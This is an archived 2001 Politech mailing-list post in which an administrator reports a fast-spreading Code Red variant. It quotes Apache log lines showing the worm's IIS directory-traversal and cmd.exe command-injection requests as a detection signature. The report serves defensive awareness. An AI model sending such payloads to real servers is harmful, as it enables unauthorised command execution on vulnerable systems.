[BTW I'm seeing similar attempts on Politech's website. Remember, folks, Code Red and its progeny only infect Windows systems. --Declan] ********** Date: Tue, 18 Sep 2001 11:34:26 -0400 From: Rich Kulawiec <rskat_private> To: Declan McCullagh <declanat_private> Subject: It would appear that a 'Code Red' worm variant is in the wild I'm seeing reports on nanog, inet-access, and isp-webhosting about this; a fast look at my own web servers indicates that it's real, and that the hits are coming at a ferocious rate. (I would guesstimate at 10x the rate at which Code Red hit.) This seems to have started within the last few hours; the first entry in my logs is from 0930 EDT today. Here's a snippet from the Apache error log; this appears to constitute the signature of this worm: A.B.C.D - - [18/Sep/2001:11:30:11 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 270 A.B.C.D - - [18/Sep/2001:11:30:11 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 268 A.B.C.D - - [18/Sep/2001:11:30:11 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278 A.B.C.D - - [18/Sep/2001:11:30:11 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 278 A.B.C.D - - [18/Sep/2001:11:30:12 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 A.B.C.D - - [18/Sep/2001:11:30:12 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 A.B.C.D - - [18/Sep/2001:11:30:12 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 A.B.C.D - - [18/Sep/2001:11:30:12 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP /1.0" 404 325 A.B.C.D - - [18/Sep/2001:11:30:13 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 A.B.C.D - - [18/Sep/2001:11:30:16 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 A.B.C.D - - [18/Sep/2001:11:30:16 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 A.B.C.D - - [18/Sep/2001:11:30:16 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 A.B.C.D - - [18/Sep/2001:11:30:17 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 A.B.C.D - - [18/Sep/2001:11:30:17 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 A.B.C.D - - [18/Sep/2001:11:30:17 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 A.B.C.D - - [18/Sep/2001:11:30:18 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 292 So far, all hits have come in groups of 16 and appear to be directed at exploiting a vulnerability that's presumably found on Windows systems running IIS. They also *seem* to be largely localized, that is, the IP addresses of the incoming probes are related to the IP addresses of the systems being targeted. The sad part about this is that chunks of the 'net are already bottlenecked under the load caused by the past weeks' events and the attempts to disseminate information about them, including photos of missing persons, etc. ---Rsk Rich Kulawiec rskat_private ------------------------------------------------------------------------- POLITECH -- Declan McCullagh's politics and technology mailing list You may redistribute this message freely if you include this notice. Declan McCullagh's photographs are at http://www.mccullagh.org/ To subscribe to Politech: http://www.politechbot.com/info/subscribe.html This message is archived at http://www.politechbot.com/ -------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 12:44:04 PDT